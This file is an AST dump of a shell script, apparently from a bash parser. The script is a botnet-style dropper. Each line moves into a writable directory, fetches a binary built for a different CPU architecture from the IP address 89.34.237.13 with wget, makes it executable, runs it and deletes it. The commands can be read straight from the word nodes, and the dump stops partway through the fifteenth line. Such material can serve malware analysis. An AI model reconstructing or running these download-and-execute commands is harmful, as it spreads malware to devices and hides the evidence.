ListNode(lineno=2, pos=(12, 74), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 74), parts=[
    WordNode(lineno=2, pos=(67, 69), word='rm'),
    WordNode(lineno=2, pos=(70, 74), word='arc*'),
  ]),
])
ListNode(lineno=3, pos=(75, 199), parts=[
  CommandNode(lineno=3, pos=(75, 82), parts=[
    WordNode(lineno=3, pos=(75, 77), word='cd'),
    WordNode(lineno=3, pos=(78, 82), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(83, 85)),
  CommandNode(lineno=3, pos=(86, 97), parts=[
    WordNode(lineno=3, pos=(86, 88), word='cd'),
    WordNode(lineno=3, pos=(89, 97), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(98, 100)),
  CommandNode(lineno=3, pos=(101, 108), parts=[
    WordNode(lineno=3, pos=(101, 103), word='cd'),
    WordNode(lineno=3, pos=(104, 108), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(109, 111)),
  CommandNode(lineno=3, pos=(112, 120), parts=[
    WordNode(lineno=3, pos=(112, 114), word='cd'),
    WordNode(lineno=3, pos=(115, 120), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(121, 123)),
  CommandNode(lineno=3, pos=(124, 128), parts=[
    WordNode(lineno=3, pos=(124, 126), word='cd'),
    WordNode(lineno=3, pos=(127, 128), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(128, 129)),
  CommandNode(lineno=3, pos=(130, 160), parts=[
    WordNode(lineno=3, pos=(130, 134), word='wget'),
    WordNode(lineno=3, pos=(135, 160), word='http://89.34.237.13/arcms'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(160, 161)),
  CommandNode(lineno=3, pos=(162, 176), parts=[
    WordNode(lineno=3, pos=(162, 167), word='chmod'),
    WordNode(lineno=3, pos=(168, 170), word='+x'),
    WordNode(lineno=3, pos=(171, 176), word='arcms'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(176, 177)),
  CommandNode(lineno=3, pos=(178, 185), parts=[
    WordNode(lineno=3, pos=(178, 185), word='./arcms'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(185, 186)),
  CommandNode(lineno=3, pos=(187, 199), parts=[
    WordNode(lineno=3, pos=(187, 189), word='rm'),
    WordNode(lineno=3, pos=(190, 193), word='-rf'),
    WordNode(lineno=3, pos=(194, 199), word='arcms'),
  ]),
])
ListNode(lineno=4, pos=(200, 324), parts=[
  CommandNode(lineno=4, pos=(200, 207), parts=[
    WordNode(lineno=4, pos=(200, 202), word='cd'),
    WordNode(lineno=4, pos=(203, 207), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(208, 210)),
  CommandNode(lineno=4, pos=(211, 222), parts=[
    WordNode(lineno=4, pos=(211, 213), word='cd'),
    WordNode(lineno=4, pos=(214, 222), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(223, 225)),
  CommandNode(lineno=4, pos=(226, 233), parts=[
    WordNode(lineno=4, pos=(226, 228), word='cd'),
    WordNode(lineno=4, pos=(229, 233), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(234, 236)),
  CommandNode(lineno=4, pos=(237, 245), parts=[
    WordNode(lineno=4, pos=(237, 239), word='cd'),
    WordNode(lineno=4, pos=(240, 245), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(246, 248)),
  CommandNode(lineno=4, pos=(249, 253), parts=[
    WordNode(lineno=4, pos=(249, 251), word='cd'),
    WordNode(lineno=4, pos=(252, 253), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(253, 254)),
  CommandNode(lineno=4, pos=(255, 285), parts=[
    WordNode(lineno=4, pos=(255, 259), word='wget'),
    WordNode(lineno=4, pos=(260, 285), word='http://89.34.237.13/arcml'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(285, 286)),
  CommandNode(lineno=4, pos=(287, 301), parts=[
    WordNode(lineno=4, pos=(287, 292), word='chmod'),
    WordNode(lineno=4, pos=(293, 295), word='+x'),
    WordNode(lineno=4, pos=(296, 301), word='arcml'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(301, 302)),
  CommandNode(lineno=4, pos=(303, 310), parts=[
    WordNode(lineno=4, pos=(303, 310), word='./arcml'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(310, 311)),
  CommandNode(lineno=4, pos=(312, 324), parts=[
    WordNode(lineno=4, pos=(312, 314), word='rm'),
    WordNode(lineno=4, pos=(315, 318), word='-rf'),
    WordNode(lineno=4, pos=(319, 324), word='arcml'),
  ]),
])
ListNode(lineno=5, pos=(325, 449), parts=[
  CommandNode(lineno=5, pos=(325, 332), parts=[
    WordNode(lineno=5, pos=(325, 327), word='cd'),
    WordNode(lineno=5, pos=(328, 332), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(333, 335)),
  CommandNode(lineno=5, pos=(336, 347), parts=[
    WordNode(lineno=5, pos=(336, 338), word='cd'),
    WordNode(lineno=5, pos=(339, 347), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(348, 350)),
  CommandNode(lineno=5, pos=(351, 358), parts=[
    WordNode(lineno=5, pos=(351, 353), word='cd'),
    WordNode(lineno=5, pos=(354, 358), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(359, 361)),
  CommandNode(lineno=5, pos=(362, 370), parts=[
    WordNode(lineno=5, pos=(362, 364), word='cd'),
    WordNode(lineno=5, pos=(365, 370), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(371, 373)),
  CommandNode(lineno=5, pos=(374, 378), parts=[
    WordNode(lineno=5, pos=(374, 376), word='cd'),
    WordNode(lineno=5, pos=(377, 378), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(378, 379)),
  CommandNode(lineno=5, pos=(380, 410), parts=[
    WordNode(lineno=5, pos=(380, 384), word='wget'),
    WordNode(lineno=5, pos=(385, 410), word='http://89.34.237.13/arc4t'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(410, 411)),
  CommandNode(lineno=5, pos=(412, 426), parts=[
    WordNode(lineno=5, pos=(412, 417), word='chmod'),
    WordNode(lineno=5, pos=(418, 420), word='+x'),
    WordNode(lineno=5, pos=(421, 426), word='arc4t'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(426, 427)),
  CommandNode(lineno=5, pos=(428, 435), parts=[
    WordNode(lineno=5, pos=(428, 435), word='./arc4t'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(435, 436)),
  CommandNode(lineno=5, pos=(437, 449), parts=[
    WordNode(lineno=5, pos=(437, 439), word='rm'),
    WordNode(lineno=5, pos=(440, 443), word='-rf'),
    WordNode(lineno=5, pos=(444, 449), word='arc4t'),
  ]),
])
ListNode(lineno=6, pos=(450, 574), parts=[
  CommandNode(lineno=6, pos=(450, 457), parts=[
    WordNode(lineno=6, pos=(450, 452), word='cd'),
    WordNode(lineno=6, pos=(453, 457), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(458, 460)),
  CommandNode(lineno=6, pos=(461, 472), parts=[
    WordNode(lineno=6, pos=(461, 463), word='cd'),
    WordNode(lineno=6, pos=(464, 472), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(473, 475)),
  CommandNode(lineno=6, pos=(476, 483), parts=[
    WordNode(lineno=6, pos=(476, 478), word='cd'),
    WordNode(lineno=6, pos=(479, 483), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(484, 486)),
  CommandNode(lineno=6, pos=(487, 495), parts=[
    WordNode(lineno=6, pos=(487, 489), word='cd'),
    WordNode(lineno=6, pos=(490, 495), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(496, 498)),
  CommandNode(lineno=6, pos=(499, 503), parts=[
    WordNode(lineno=6, pos=(499, 501), word='cd'),
    WordNode(lineno=6, pos=(502, 503), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(503, 504)),
  CommandNode(lineno=6, pos=(505, 535), parts=[
    WordNode(lineno=6, pos=(505, 509), word='wget'),
    WordNode(lineno=6, pos=(510, 535), word='http://89.34.237.13/arc4l'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(535, 536)),
  CommandNode(lineno=6, pos=(537, 551), parts=[
    WordNode(lineno=6, pos=(537, 542), word='chmod'),
    WordNode(lineno=6, pos=(543, 545), word='+x'),
    WordNode(lineno=6, pos=(546, 551), word='arc4l'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(551, 552)),
  CommandNode(lineno=6, pos=(553, 560), parts=[
    WordNode(lineno=6, pos=(553, 560), word='./arc4l'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(560, 561)),
  CommandNode(lineno=6, pos=(562, 574), parts=[
    WordNode(lineno=6, pos=(562, 564), word='rm'),
    WordNode(lineno=6, pos=(565, 568), word='-rf'),
    WordNode(lineno=6, pos=(569, 574), word='arc4l'),
  ]),
])
ListNode(lineno=7, pos=(575, 699), parts=[
  CommandNode(lineno=7, pos=(575, 582), parts=[
    WordNode(lineno=7, pos=(575, 577), word='cd'),
    WordNode(lineno=7, pos=(578, 582), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(583, 585)),
  CommandNode(lineno=7, pos=(586, 597), parts=[
    WordNode(lineno=7, pos=(586, 588), word='cd'),
    WordNode(lineno=7, pos=(589, 597), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(598, 600)),
  CommandNode(lineno=7, pos=(601, 608), parts=[
    WordNode(lineno=7, pos=(601, 603), word='cd'),
    WordNode(lineno=7, pos=(604, 608), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(609, 611)),
  CommandNode(lineno=7, pos=(612, 620), parts=[
    WordNode(lineno=7, pos=(612, 614), word='cd'),
    WordNode(lineno=7, pos=(615, 620), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(621, 623)),
  CommandNode(lineno=7, pos=(624, 628), parts=[
    WordNode(lineno=7, pos=(624, 626), word='cd'),
    WordNode(lineno=7, pos=(627, 628), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(628, 629)),
  CommandNode(lineno=7, pos=(630, 660), parts=[
    WordNode(lineno=7, pos=(630, 634), word='wget'),
    WordNode(lineno=7, pos=(635, 660), word='http://89.34.237.13/arc5l'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(660, 661)),
  CommandNode(lineno=7, pos=(662, 676), parts=[
    WordNode(lineno=7, pos=(662, 667), word='chmod'),
    WordNode(lineno=7, pos=(668, 670), word='+x'),
    WordNode(lineno=7, pos=(671, 676), word='arc5l'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(676, 677)),
  CommandNode(lineno=7, pos=(678, 685), parts=[
    WordNode(lineno=7, pos=(678, 685), word='./arc5l'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(685, 686)),
  CommandNode(lineno=7, pos=(687, 699), parts=[
    WordNode(lineno=7, pos=(687, 689), word='rm'),
    WordNode(lineno=7, pos=(690, 693), word='-rf'),
    WordNode(lineno=7, pos=(694, 699), word='arc5l'),
  ]),
])
ListNode(lineno=8, pos=(700, 824), parts=[
  CommandNode(lineno=8, pos=(700, 707), parts=[
    WordNode(lineno=8, pos=(700, 702), word='cd'),
    WordNode(lineno=8, pos=(703, 707), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(708, 710)),
  CommandNode(lineno=8, pos=(711, 722), parts=[
    WordNode(lineno=8, pos=(711, 713), word='cd'),
    WordNode(lineno=8, pos=(714, 722), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(723, 725)),
  CommandNode(lineno=8, pos=(726, 733), parts=[
    WordNode(lineno=8, pos=(726, 728), word='cd'),
    WordNode(lineno=8, pos=(729, 733), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(734, 736)),
  CommandNode(lineno=8, pos=(737, 745), parts=[
    WordNode(lineno=8, pos=(737, 739), word='cd'),
    WordNode(lineno=8, pos=(740, 745), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(746, 748)),
  CommandNode(lineno=8, pos=(749, 753), parts=[
    WordNode(lineno=8, pos=(749, 751), word='cd'),
    WordNode(lineno=8, pos=(752, 753), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(753, 754)),
  CommandNode(lineno=8, pos=(755, 785), parts=[
    WordNode(lineno=8, pos=(755, 759), word='wget'),
    WordNode(lineno=8, pos=(760, 785), word='http://89.34.237.13/arc6l'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(785, 786)),
  CommandNode(lineno=8, pos=(787, 801), parts=[
    WordNode(lineno=8, pos=(787, 792), word='chmod'),
    WordNode(lineno=8, pos=(793, 795), word='+x'),
    WordNode(lineno=8, pos=(796, 801), word='arc6l'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(801, 802)),
  CommandNode(lineno=8, pos=(803, 810), parts=[
    WordNode(lineno=8, pos=(803, 810), word='./arc6l'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(810, 811)),
  CommandNode(lineno=8, pos=(812, 824), parts=[
    WordNode(lineno=8, pos=(812, 814), word='rm'),
    WordNode(lineno=8, pos=(815, 818), word='-rf'),
    WordNode(lineno=8, pos=(819, 824), word='arc6l'),
  ]),
])
ListNode(lineno=9, pos=(825, 949), parts=[
  CommandNode(lineno=9, pos=(825, 832), parts=[
    WordNode(lineno=9, pos=(825, 827), word='cd'),
    WordNode(lineno=9, pos=(828, 832), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(833, 835)),
  CommandNode(lineno=9, pos=(836, 847), parts=[
    WordNode(lineno=9, pos=(836, 838), word='cd'),
    WordNode(lineno=9, pos=(839, 847), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(848, 850)),
  CommandNode(lineno=9, pos=(851, 858), parts=[
    WordNode(lineno=9, pos=(851, 853), word='cd'),
    WordNode(lineno=9, pos=(854, 858), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(859, 861)),
  CommandNode(lineno=9, pos=(862, 870), parts=[
    WordNode(lineno=9, pos=(862, 864), word='cd'),
    WordNode(lineno=9, pos=(865, 870), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(871, 873)),
  CommandNode(lineno=9, pos=(874, 878), parts=[
    WordNode(lineno=9, pos=(874, 876), word='cd'),
    WordNode(lineno=9, pos=(877, 878), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(878, 879)),
  CommandNode(lineno=9, pos=(880, 910), parts=[
    WordNode(lineno=9, pos=(880, 884), word='wget'),
    WordNode(lineno=9, pos=(885, 910), word='http://89.34.237.13/arc7l'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(910, 911)),
  CommandNode(lineno=9, pos=(912, 926), parts=[
    WordNode(lineno=9, pos=(912, 917), word='chmod'),
    WordNode(lineno=9, pos=(918, 920), word='+x'),
    WordNode(lineno=9, pos=(921, 926), word='arc7l'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(926, 927)),
  CommandNode(lineno=9, pos=(928, 935), parts=[
    WordNode(lineno=9, pos=(928, 935), word='./arc7l'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(935, 936)),
  CommandNode(lineno=9, pos=(937, 949), parts=[
    WordNode(lineno=9, pos=(937, 939), word='rm'),
    WordNode(lineno=9, pos=(940, 943), word='-rf'),
    WordNode(lineno=9, pos=(944, 949), word='arc7l'),
  ]),
])
ListNode(lineno=10, pos=(950, 1074), parts=[
  CommandNode(lineno=10, pos=(950, 957), parts=[
    WordNode(lineno=10, pos=(950, 952), word='cd'),
    WordNode(lineno=10, pos=(953, 957), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(958, 960)),
  CommandNode(lineno=10, pos=(961, 972), parts=[
    WordNode(lineno=10, pos=(961, 963), word='cd'),
    WordNode(lineno=10, pos=(964, 972), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(973, 975)),
  CommandNode(lineno=10, pos=(976, 983), parts=[
    WordNode(lineno=10, pos=(976, 978), word='cd'),
    WordNode(lineno=10, pos=(979, 983), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(984, 986)),
  CommandNode(lineno=10, pos=(987, 995), parts=[
    WordNode(lineno=10, pos=(987, 989), word='cd'),
    WordNode(lineno=10, pos=(990, 995), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(996, 998)),
  CommandNode(lineno=10, pos=(999, 1003), parts=[
    WordNode(lineno=10, pos=(999, 1001), word='cd'),
    WordNode(lineno=10, pos=(1002, 1003), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1003, 1004)),
  CommandNode(lineno=10, pos=(1005, 1035), parts=[
    WordNode(lineno=10, pos=(1005, 1009), word='wget'),
    WordNode(lineno=10, pos=(1010, 1035), word='http://89.34.237.13/arcsh'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1035, 1036)),
  CommandNode(lineno=10, pos=(1037, 1051), parts=[
    WordNode(lineno=10, pos=(1037, 1042), word='chmod'),
    WordNode(lineno=10, pos=(1043, 1045), word='+x'),
    WordNode(lineno=10, pos=(1046, 1051), word='arcsh'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1051, 1052)),
  CommandNode(lineno=10, pos=(1053, 1060), parts=[
    WordNode(lineno=10, pos=(1053, 1060), word='./arcsh'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1060, 1061)),
  CommandNode(lineno=10, pos=(1062, 1074), parts=[
    WordNode(lineno=10, pos=(1062, 1064), word='rm'),
    WordNode(lineno=10, pos=(1065, 1068), word='-rf'),
    WordNode(lineno=10, pos=(1069, 1074), word='arcsh'),
  ]),
])
ListNode(lineno=11, pos=(1075, 1199), parts=[
  CommandNode(lineno=11, pos=(1075, 1082), parts=[
    WordNode(lineno=11, pos=(1075, 1077), word='cd'),
    WordNode(lineno=11, pos=(1078, 1082), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1083, 1085)),
  CommandNode(lineno=11, pos=(1086, 1097), parts=[
    WordNode(lineno=11, pos=(1086, 1088), word='cd'),
    WordNode(lineno=11, pos=(1089, 1097), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1098, 1100)),
  CommandNode(lineno=11, pos=(1101, 1108), parts=[
    WordNode(lineno=11, pos=(1101, 1103), word='cd'),
    WordNode(lineno=11, pos=(1104, 1108), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1109, 1111)),
  CommandNode(lineno=11, pos=(1112, 1120), parts=[
    WordNode(lineno=11, pos=(1112, 1114), word='cd'),
    WordNode(lineno=11, pos=(1115, 1120), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1121, 1123)),
  CommandNode(lineno=11, pos=(1124, 1128), parts=[
    WordNode(lineno=11, pos=(1124, 1126), word='cd'),
    WordNode(lineno=11, pos=(1127, 1128), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1128, 1129)),
  CommandNode(lineno=11, pos=(1130, 1160), parts=[
    WordNode(lineno=11, pos=(1130, 1134), word='wget'),
    WordNode(lineno=11, pos=(1135, 1160), word='http://89.34.237.13/arcpc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1160, 1161)),
  CommandNode(lineno=11, pos=(1162, 1176), parts=[
    WordNode(lineno=11, pos=(1162, 1167), word='chmod'),
    WordNode(lineno=11, pos=(1168, 1170), word='+x'),
    WordNode(lineno=11, pos=(1171, 1176), word='arcpc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1176, 1177)),
  CommandNode(lineno=11, pos=(1178, 1185), parts=[
    WordNode(lineno=11, pos=(1178, 1185), word='./arcpc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1185, 1186)),
  CommandNode(lineno=11, pos=(1187, 1199), parts=[
    WordNode(lineno=11, pos=(1187, 1189), word='rm'),
    WordNode(lineno=11, pos=(1190, 1193), word='-rf'),
    WordNode(lineno=11, pos=(1194, 1199), word='arcpc'),
  ]),
])
ListNode(lineno=12, pos=(1200, 1328), parts=[
  CommandNode(lineno=12, pos=(1200, 1207), parts=[
    WordNode(lineno=12, pos=(1200, 1202), word='cd'),
    WordNode(lineno=12, pos=(1203, 1207), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1208, 1210)),
  CommandNode(lineno=12, pos=(1211, 1222), parts=[
    WordNode(lineno=12, pos=(1211, 1213), word='cd'),
    WordNode(lineno=12, pos=(1214, 1222), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1223, 1225)),
  CommandNode(lineno=12, pos=(1226, 1233), parts=[
    WordNode(lineno=12, pos=(1226, 1228), word='cd'),
    WordNode(lineno=12, pos=(1229, 1233), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1234, 1236)),
  CommandNode(lineno=12, pos=(1237, 1245), parts=[
    WordNode(lineno=12, pos=(1237, 1239), word='cd'),
    WordNode(lineno=12, pos=(1240, 1245), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1246, 1248)),
  CommandNode(lineno=12, pos=(1249, 1253), parts=[
    WordNode(lineno=12, pos=(1249, 1251), word='cd'),
    WordNode(lineno=12, pos=(1252, 1253), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1253, 1254)),
  CommandNode(lineno=12, pos=(1255, 1286), parts=[
    WordNode(lineno=12, pos=(1255, 1259), word='wget'),
    WordNode(lineno=12, pos=(1260, 1286), word='http://89.34.237.13/arc440'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1286, 1287)),
  CommandNode(lineno=12, pos=(1288, 1303), parts=[
    WordNode(lineno=12, pos=(1288, 1293), word='chmod'),
    WordNode(lineno=12, pos=(1294, 1296), word='+x'),
    WordNode(lineno=12, pos=(1297, 1303), word='arc440'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1303, 1304)),
  CommandNode(lineno=12, pos=(1305, 1313), parts=[
    WordNode(lineno=12, pos=(1305, 1313), word='./arc440'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1313, 1314)),
  CommandNode(lineno=12, pos=(1315, 1328), parts=[
    WordNode(lineno=12, pos=(1315, 1317), word='rm'),
    WordNode(lineno=12, pos=(1318, 1321), word='-rf'),
    WordNode(lineno=12, pos=(1322, 1328), word='arc440'),
  ]),
])
ListNode(lineno=13, pos=(1329, 1457), parts=[
  CommandNode(lineno=13, pos=(1329, 1336), parts=[
    WordNode(lineno=13, pos=(1329, 1331), word='cd'),
    WordNode(lineno=13, pos=(1332, 1336), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1337, 1339)),
  CommandNode(lineno=13, pos=(1340, 1351), parts=[
    WordNode(lineno=13, pos=(1340, 1342), word='cd'),
    WordNode(lineno=13, pos=(1343, 1351), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1352, 1354)),
  CommandNode(lineno=13, pos=(1355, 1362), parts=[
    WordNode(lineno=13, pos=(1355, 1357), word='cd'),
    WordNode(lineno=13, pos=(1358, 1362), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1363, 1365)),
  CommandNode(lineno=13, pos=(1366, 1374), parts=[
    WordNode(lineno=13, pos=(1366, 1368), word='cd'),
    WordNode(lineno=13, pos=(1369, 1374), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1375, 1377)),
  CommandNode(lineno=13, pos=(1378, 1382), parts=[
    WordNode(lineno=13, pos=(1378, 1380), word='cd'),
    WordNode(lineno=13, pos=(1381, 1382), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1382, 1383)),
  CommandNode(lineno=13, pos=(1384, 1415), parts=[
    WordNode(lineno=13, pos=(1384, 1388), word='wget'),
    WordNode(lineno=13, pos=(1389, 1415), word='http://89.34.237.13/arcm68'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1415, 1416)),
  CommandNode(lineno=13, pos=(1417, 1432), parts=[
    WordNode(lineno=13, pos=(1417, 1422), word='chmod'),
    WordNode(lineno=13, pos=(1423, 1425), word='+x'),
    WordNode(lineno=13, pos=(1426, 1432), word='arcm68'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1432, 1433)),
  CommandNode(lineno=13, pos=(1434, 1442), parts=[
    WordNode(lineno=13, pos=(1434, 1442), word='./arcm68'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1442, 1443)),
  CommandNode(lineno=13, pos=(1444, 1457), parts=[
    WordNode(lineno=13, pos=(1444, 1446), word='rm'),
    WordNode(lineno=13, pos=(1447, 1450), word='-rf'),
    WordNode(lineno=13, pos=(1451, 1457), word='arcm68'),
  ]),
])
ListNode(lineno=14, pos=(1458, 1590), parts=[
  CommandNode(lineno=14, pos=(1458, 1465), parts=[
    WordNode(lineno=14, pos=(1458, 1460), word='cd'),
    WordNode(lineno=14, pos=(1461, 1465), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1466, 1468)),
  CommandNode(lineno=14, pos=(1469, 1480), parts=[
    WordNode(lineno=14, pos=(1469, 1471), word='cd'),
    WordNode(lineno=14, pos=(1472, 1480), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1481, 1483)),
  CommandNode(lineno=14, pos=(1484, 1491), parts=[
    WordNode(lineno=14, pos=(1484, 1486), word='cd'),
    WordNode(lineno=14, pos=(1487, 1491), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1492, 1494)),
  CommandNode(lineno=14, pos=(1495, 1503), parts=[
    WordNode(lineno=14, pos=(1495, 1497), word='cd'),
    WordNode(lineno=14, pos=(1498, 1503), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1504, 1506)),
  CommandNode(lineno=14, pos=(1507, 1511), parts=[
    WordNode(lineno=14, pos=(1507, 1509), word='cd'),
    WordNode(lineno=14, pos=(1510, 1511), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1511, 1512)),
  CommandNode(lineno=14, pos=(1513, 1545), parts=[
    WordNode(lineno=14, pos=(1513, 1517), word='wget'),
    WordNode(lineno=14, pos=(1518, 1545), word='http://89.34.237.13/arcsprc'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1545, 1546)),
  CommandNode(lineno=14, pos=(1547, 1563), parts=[
    WordNode(lineno=14, pos=(1547, 1552), word='chmod'),
    WordNode(lineno=14, pos=(1553, 1555), word='+x'),
    WordNode(lineno=14, pos=(1556, 1563), word='arcsprc'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1563, 1564)),
  CommandNode(lineno=14, pos=(1565, 1574), parts=[
    WordNode(lineno=14, pos=(1565, 1574), word='./arcsprc'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1574, 1575)),
  CommandNode(lineno=14, pos=(1576, 1590), parts=[
    WordNode(lineno=14, pos=(1576, 1578), word='rm'),
    WordNode(lineno=14, pos=(1579, 1582), word='-rf'),
    WordNode(lineno=14, pos=(1583, 1590), word='arcsprc'),
  ]),
])
ListNode(lineno=15, pos=(1591, 1715), parts=[
  CommandNode(lineno=15, pos=(1591, 1598), parts=[
    WordNode(lineno=15, pos=(1591, 1593), word='cd'),
    WordNode(lineno=15, pos=(1594, 1598), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1599, 1601)),
  CommandNode(lineno=15, pos=(1602, 1613), parts=[
    WordNode(lineno=15, pos=(1602, 1604), word='cd'),
    WordNode(lineno=15, pos=(1605, 1613), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1614, 1616)),
  CommandNode(lineno=15, pos=(1617, 1624), parts=[
    WordNode(lineno=15, pos=(1617, 1619), word='cd'),
    WordNode(lineno=15, pos=(1620, 1624), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1625, 1627)),
  CommandNode(lineno=15, pos=(1628, 1636), parts=[
    WordNode(lineno=15, pos=(1628, 1630), word='cd'),
    WordNode(lineno=15, pos=(1631, 1636), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1637, 1639)),
  CommandNode(lineno=15, pos=(1640, 1644), parts=[
    WordNode(lineno=15, pos=(1640, 1642), word='cd'),
    WordNode(lineno=15, pos=(1643, 1644), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1644, 1645)),
  CommandNode(lineno=15, pos=(1646, 1676), parts=[
